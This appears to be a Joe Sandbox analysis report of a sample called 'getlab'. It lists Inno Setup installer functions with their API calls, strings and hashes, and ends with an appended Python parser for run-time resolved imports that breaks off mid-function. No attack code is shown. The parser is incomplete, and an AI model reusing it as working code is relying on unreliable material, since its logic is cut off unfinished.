                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-3657609586
                                                                          • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                          • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                                          • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                          • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                          • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                          • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                          • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                          • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                                          • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                          • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                                          Strings
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                                          • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                          • API String ID: 3850602802-3720027226
                                                                          • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                          • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                                          • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                          • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                                          APIs
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • GetFocus.USER32 ref: 004781EB
                                                                          • GetKeyState.USER32(0000007A), ref: 004781FD
                                                                          • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                          • String ID: Wnd=$%x
                                                                          • API String ID: 1381870634-2927251529
                                                                          • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                          • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                                          • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                          • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                                          APIs
                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$LocalSystem
                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                          • API String ID: 1748579591-1013271723
                                                                          • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                          • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                                          • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                          • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                                          APIs
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3024442154-139070271
                                                                          • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                          • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                                          • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                          • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                          • API String ID: 47109696-2631785700
                                                                          • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                          • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                                          • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                          • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                                          Strings
                                                                          • CSDVersion, xrefs: 004831B8
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 3677997916-1910633163
                                                                          • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                          • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                                          • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                          • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                          • API String ID: 1646373207-4063490227
                                                                          • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                          • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                                          • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                          • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                          • API String ID: 1646373207-260599015
                                                                          • Opcode ID: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                          • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                                          • Opcode Fuzzy Hash: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                          • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: NotifyWinEvent$user32.dll
                                                                          • API String ID: 1646373207-597752486
                                                                          • Opcode ID: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                          • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                                          • Opcode Fuzzy Hash: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                          • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                          • API String ID: 1646373207-834958232
                                                                          • Opcode ID: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                          • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                                          • Opcode Fuzzy Hash: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                          • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                                          APIs
                                                                            • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2238633743-2683653824
                                                                          • Opcode ID: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                          • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                                          • Opcode Fuzzy Hash: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                          • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
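The blocks above all follow one pattern: the binary does not import GetSystemWow64DirectoryA, ShutdownBlockReasonDestroy, NotifyWinEvent, DisableProcessWindowsGhosting, SHPathPrepareForWriteA or the uxtheme.dll theme functions through its import table, but resolves them at run time with GetModuleHandleA/LoadLibraryA followed by GetProcAddress. As an added example for this page (not Joe Sandbox tooling and not code from the analysed sample), the Python below parses these "APIs" listings and recovers the (dll, export, call site) triples. Its pairing rule is an assumption about this report's layout rather than a documented format: the export name is read from GetProcAddress's second argument when that is a symbol (the uxtheme block), otherwise from the second argument shown on the preceding loader call (the kernel32, user32 and shell32 blocks). The sample input is an excerpt of the lines shown above with the uxtheme entries shortened.

```python
"""Recover run-time resolved imports from Joe Sandbox 'APIs' listings.

Added example for this report page; it is not Joe Sandbox tooling and not
code from the analysed sample. Each GetProcAddress line is paired with the
GetModuleHandleA/LoadLibraryA line that precedes it in the same function
block, which is where the blocks above expose the export being resolved.
"""
import re
from typing import Dict, List, Optional, Tuple

# One call line: '• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: ADDR'
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<lib>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW",
           "LoadLibraryExA", "LoadLibraryExW"}
DLL_RE = re.compile(r"^[\w.-]+\.dll$", re.IGNORECASE)
# Stack slots the sandbox could not name: 8 hex digits, optionally with a flag decode.
HEX_RE = re.compile(r"^[0-9A-F]{8}(\(.*\))?$")


def is_symbol(tok: str) -> bool:
    """True for a bare export name such as 'OpenThemeData' (not '?', hex or a dll)."""
    return (tok not in ("", "?") and not HEX_RE.match(tok)
            and not DLL_RE.match(tok) and re.fullmatch(r"\w+", tok) is not None)


def resolved_imports(listing: str) -> List[Tuple[str, str, str]]:
    """Return (dll, export, call_site) for every GetProcAddress in the listing.

    Heuristic for this report layout (an assumption, not a documented format):
    the export name comes from GetProcAddress's second argument when that is a
    symbol, otherwise from the second argument of the preceding loader call.
    """
    found: List[Tuple[str, str, str]] = []
    module: Optional[str] = None   # dll named by the last loader call in this block
    pending: Optional[str] = None  # export name seen on that loader call's stack
    for line in listing.splitlines():
        if line.strip() == "APIs":            # new function block: forget state
            module = pending = None
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")]
        api = m.group("api")
        if api in LOADERS:
            if args and DLL_RE.match(args[0]):
                module = args[0].lower()
                pending = args[1] if len(args) > 1 and is_symbol(args[1]) else None
        elif api == "GetProcAddress":
            name = args[1] if len(args) > 1 else ""
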